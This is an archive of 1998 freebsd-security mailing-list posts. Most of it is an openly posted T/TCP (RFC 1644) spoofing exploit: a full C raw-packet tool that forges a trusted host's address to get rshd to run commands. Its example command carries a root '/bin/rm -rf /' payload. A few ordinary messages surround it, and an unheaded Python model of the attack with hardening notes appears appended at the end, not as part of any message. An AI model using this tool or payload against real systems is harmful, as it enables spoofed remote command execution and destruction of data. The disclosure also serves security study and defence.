From owner-freebsd-security Sun Apr 5 07:17:08 1998
From: Michael Gulyaev
To: freebsd-security@FreeBSD.ORG
Date: Sun, 5 Apr 1998 17:23:37 +0300 (EEST)
Subject: tcp/ip stack & user process

Hi,

Does anybody know how one can create a link between the tcp/ip stack and a user
process? So, if it is possible, you can look at how many bytes a user is uploading
and downloading during a session...

Any ideas are welcome....
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message

From owner-freebsd-security Tue Apr 7 06:27:08 1998
From: Vasim Valejev
To: freebsd-security@FreeBSD.ORG
Cc: bugtraq@netspace.org
Date: Tue, 7 Apr 1998 19:26:41 +0600 (ESS)
Subject: Example of RFC-1644 attack

Hi!

Good news: a SYN-flood attack with T/TCP packets will have no effect on most
systems. But attacks on some tcp services can be successful:

Simple network: computer 'victim' and computer 'master' with a link of > 10 ms
delay. Victim has '+master' in /etc/hosts.equiv and 'shell stream ... rshd' in
/etc/inetd.conf. Both computers have t/tcp (rfc-1644) support.

1. Master makes any t/tcp connection to victim. Victim's cache[master].cc is set
   to a value > 0.

   ... Time passes ...

2. Hacker runs the command:

   hacker# 1644 master victim 514 '\0root\0root\0/bin/rm -rf /\0\0'

   Hacker's computer sends a T/TCP packet (SYN+PUSH+data) to 'victim' with the
   source address of 'master'. The CC value in the packet may be anything >
   cache[master].cc (0xffffffff, for example).

3. Hacker's packet is received and victim sends a SYN+ACK packet to master,
   preparing to run rshd with hacker's data ('rm -rf /' as root).

   ... 10-50 ms pass ...

4. Victim's packet is received and master sends an RST packet. Too late, sorry...

FreeBSD version of 1644 (uses ip addresses only):

/* 1644 by Vasim V. */
/* Please, don't use this program for any destructive targets! */
/* The eleven header names below were inside angle brackets and did not survive
   the list archive; they are left as they appear there. */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define NEED_NEWCC 0x01
#define NEED_FIN 0x02
#define NEED_PUSH 0x04
#define NEED_TSTAMP 0x08

/* pseudo-header used for the TCP checksum */
struct fhdr {
	u_long saddr;
	u_long daddr;
	u_char zero;
	u_char protocol;
	u_short length;
};

unsigned long cc = 0x7fffff00;

u_short in_cksum(u_short *data, u_short length)
{
	long value;
	u_short i;

	value = 0;
	for (i = 0; i < (length >> 1); i++)
		value += data[i];
	if (length & 1)
		value += *(((u_char *) data) + length - 1);
	value = (value & 65535) + (value >> 16);
	return (~value);
}

void sendpack(int sock, u_long saddr, u_long daddr, u_short port, u_char *data, int length, int options)
{
	struct ip *mip;
	struct tcphdr *mtcp;
	struct fhdr *fhdr;
	int totlen;
	u_char buf[9000];
	struct timeval tp;
	struct sockaddr_in sin;

	gettimeofday(&tp, NULL);
	srandom(tp.tv_usec);
	if (cc == 0)
		cc = tp.tv_sec;
	totlen = sizeof(struct ip) + sizeof(struct tcphdr);
	mtcp = (struct tcphdr *) (buf + sizeof(struct ip));
	mtcp->th_sport = htons(512 + (random() % 512));
	mtcp->th_dport = htons(port);
	mtcp->th_seq = htonl(random());
	mtcp->th_ack = 0;
	mtcp->th_x2 = 0;
	mtcp->th_flags = TH_SYN;
	if (options & NEED_FIN)
		mtcp->th_flags |= TH_FIN;
	if (options & NEED_PUSH)
		mtcp->th_flags |= TH_PUSH;
	mtcp->th_win = htons(17244);
	mtcp->th_urp = 0;
	mtcp->th_sum = 0;
	buf[totlen++] = TCPOPT_MAXSEG;
	buf[totlen++] = TCPOLEN_MAXSEG;
	*((u_short *) &buf[totlen]) = htons(1460);
	totlen += sizeof(u_short);
	if (options & NEED_TSTAMP) {
		*((u_long *) &buf[totlen]) = htonl(TCPOPT_NOP << 24 | TCPOPT_WINDOW << 16 | TCPOLEN_WINDOW << 8);
		totlen += sizeof(u_long);
		*((u_long *) &buf[totlen]) = htonl(TCPOPT_TSTAMP_HDR);
		totlen += sizeof(u_long);
		*((u_long *) &buf[totlen]) = htonl(tp.tv_sec);
		totlen += sizeof(u_long);
		*((u_long *) &buf[totlen]) = 0;
		totlen += sizeof(u_long);
	}
	buf[totlen++] = TCPOPT_NOP;
	buf[totlen++] = TCPOPT_NOP;
	if (options & NEED_NEWCC)
		buf[totlen++] = TCPOPT_CCNEW;
	else
		buf[totlen++] = TCPOPT_CC;
	buf[totlen++] = TCPOLEN_CC;
	*((u_long *) &buf[totlen]) = htonl(cc);
	cc++;
	totlen += sizeof(u_long);
	mtcp->th_off = (totlen - sizeof(struct ip)) >> 2;
	if (data && length)
		memcpy(buf + totlen, data, length);
	fhdr = (struct fhdr *) (buf + sizeof(struct ip) - sizeof(struct fhdr));
	fhdr->saddr = saddr;
	fhdr->daddr = daddr;
	fhdr->zero = 0;
	fhdr->protocol = IPPROTO_TCP;
	fhdr->length = htons(totlen - sizeof(struct ip) + length);
	mtcp->th_sum = in_cksum((u_short *) fhdr, totlen - sizeof(struct ip) + sizeof(struct fhdr) + length);
	mip = (struct ip *) buf;
	mip->ip_len = totlen + length;
	mip->ip_v = 4;
	mip->ip_hl = 5;
	mip->ip_tos = 0;
	mip->ip_id = htons(random() % 32768);
	mip->ip_off = IP_DF;
	mip->ip_ttl = 0x40;
	mip->ip_p = IPPROTO_TCP;
	mip->ip_sum = 0;
	mip->ip_src.s_addr = saddr;
	mip->ip_dst.s_addr = daddr;
	mip->ip_sum = in_cksum((u_short *) mip, sizeof(struct ip));
	memset((void *) &sin, 0, sizeof(struct sockaddr_in));
	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr = daddr;
	sin.sin_port = htons(port);
	if (sendto(sock, buf, totlen + length, 0, (struct sockaddr *) &sin, sizeof(struct sockaddr_in)) < 0)
		perror("sendto");
}

void main(int argc, char **argv)
{
	u_long saddr;
	u_long daddr;
	int port;
	int sock;
	u_char buf[8192];
	int len;
	int i;
	u_char *p;
	u_char c;

	if (argc != 5) {
		fprintf(stderr, "\n1644 by Vasim V.\n\nUsage: %s source destination port data\n", argv[0]);
		exit(1);
	}
	saddr = inet_addr(argv[1]);
	daddr = inet_addr(argv[2]);
	port = atoi(argv[3]);
	sock = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
	if (sock < 0) {
		perror("raw socket");
		exit(2);
	}
	i = 1;
	setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &i, sizeof(i));
	/* unescape \0, \r and \n in the data argument */
	p = buf;
	len = 0;
	for (i = 0; i < strlen(argv[4]); i++) {
		c = argv[4][i];
		if (c == '\\') {
			i++;
			c = argv[4][i];
			switch (c) {
			case '0': *p++ = '\0'; break;
			case 'r': *p++ = '\r'; break;
			case 'n': *p++ = '\n'; break;
			default: *p++ = c; break;
			}
		} else
			*p++ = c;
		len++;
	}
	sendpack(sock, saddr, daddr, port, buf, len, NEED_PUSH | NEED_TSTAMP);
}

Vasim V. (2:5011/27 http://members.tripod.com/~Vasim VV86-RIPE)

From owner-freebsd-security Tue Apr 7 13:01:39 1998
From: Guy Helmer
To: freebsd-security@FreeBSD.ORG
Date: Tue, 7 Apr 1998 15:01:11 -0500 (CDT)
Subject: FreeBSD security article

An article on which I've been working for a while will be published in the May
1998 issue of Sys Admin, the journal for UNIX systems administrators. The
article is a survey of the security features of FreeBSD (many of the features
are common to 4.4BSD-derived systems as well). For those who originally reviewed
a precursor of this article last year (thanks to the *many* people who reviewed
it and returned comments), you may remember the original paper tried to discuss
all of the security issues and give some background rationale for the various
issues. The published result is less ambitious (thank goodness!)
but I hope it gives a good enough introduction to the various security features
so that newer admins can understand the features and take advantage of them.

As some reviewers suggested, there may be interest in how-to articles on
securing a system, such as a web server. Unless someone beats me to it, maybe
I'll work on such a thing this summer.

Again, a public thanks to *everyone* who reviewed the previous paper and
provided comments.

Guy Helmer

Guy Helmer, Graduate Student, Iowa State University Dept. of Computer Science
Research Assistant, Ames Laboratory --- ghelmer@scl.ameslab.gov
http://www.cs.iastate.edu/~ghelmer

From owner-freebsd-security Wed Apr 8 04:31:19 1998
From: Darren Reed
To: mg@rau.lv (Michael Gulyaev)
Cc: freebsd-security@FreeBSD.ORG
Date: Wed, 8 Apr 1998 21:31:14 +1000 (EST)
Subject: Re: tcp/ip stack & user process

In some mail from Michael Gulyaev, sie said:
>
> Hi,
>
> Does anybody know, how can create a link between tcp/ip stack and user
> process ? So, if it possible, you can look how many bytes user up & down
> loading during session...
> Any ideas are welcome....

The number of bytes is determinable by the file offset counter in the
"struct file".

Darren
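Returning to Vasim's RFC-1644 example earlier in this thread: the following is an added toy model, not code from his post or from the FreeBSD stack, of the receiver-side decision that steps 1-4 rely on. It assumes the names Segment, Victim, attack and legitimate and a placeholder request payload; it contrasts the accelerated-open path (data from a SYN handed to rshd as soon as the CC option exceeds cache[master].cc) with a stack that holds SYN data until the handshake completes, and checks that the real master still works in both modes.

```python
from dataclasses import dataclass, field
@dataclass
class Segment:
    src: str                    # source address in the IP header (may be forged)
    syn: bool = False
    data: bytes = b""
    cc: int = None              # RFC 1644 CC option value, None if absent
    ack_of_synack: bool = False

@dataclass
class Victim:
    trusted: set                                   # '+master' in /etc/hosts.equiv
    tao_enabled: bool                              # RFC 1644 accelerated open on?
    cc_cache: dict = field(default_factory=dict)   # cache[peer].cc
    pending: dict = field(default_factory=dict)    # half-open: src -> queued data
    delivered: list = field(default_factory=list)  # requests handed to rshd

    def receive(self, seg):
        if seg.syn and seg.data:
            # TAO test: any CC above the cached value passes, and the stack
            # hands the data to the service before the handshake completes.
            if self.tao_enabled and seg.cc is not None and seg.cc > self.cc_cache.get(seg.src, 0):
                self.cc_cache[seg.src] = seg.cc
                return self._deliver(seg.src, seg.data)
            # Hardened path: hold the data until the peer ACKs our SYN+ACK,
            # which a forged source address can never do.
            self.pending[seg.src] = seg.data
            return "syn-ack-sent"
        if seg.ack_of_synack and seg.src in self.pending:
            return self._deliver(seg.src, self.pending.pop(seg.src))
        return "ignored"

    def _deliver(self, src, data):
        if src not in self.trusted:
            return "rejected-by-hosts-equiv"
        self.delivered.append(data)
        return "run-by-rshd"

def attack(tao_enabled):
    # Steps 1-4 of the post; the request bytes are a constructed placeholder.
    v = Victim(trusted={"master"}, tao_enabled=tao_enabled)
    v.cc_cache["master"] = 1234                     # step 1: earlier real T/TCP session
    forged = Segment("master", syn=True, data=b"<rsh request>", cc=0xFFFFFFFF)
    result = v.receive(forged)                      # steps 2-3: forged SYN+PUSH+data
    v.pending.pop("master", None)                   # step 4: master's RST, 10-50 ms later
    return result, len(v.delivered)

def legitimate(tao_enabled):
    # The real master can finish the handshake, so it works in both modes.
    v = Victim(trusted={"master"}, tao_enabled=tao_enabled)
    v.receive(Segment("master", syn=True, data=b"<rsh request>", cc=5))
    v.receive(Segment("master", ack_of_synack=True))
    return len(v.delivered)
```

The host-level equivalents of the hardened path are turning off RFC 1644 accelerated open (net.inet.tcp.rfc1644=0 on FreeBSD releases of that era) and not letting rshd trust a bare source address through hosts.equiv.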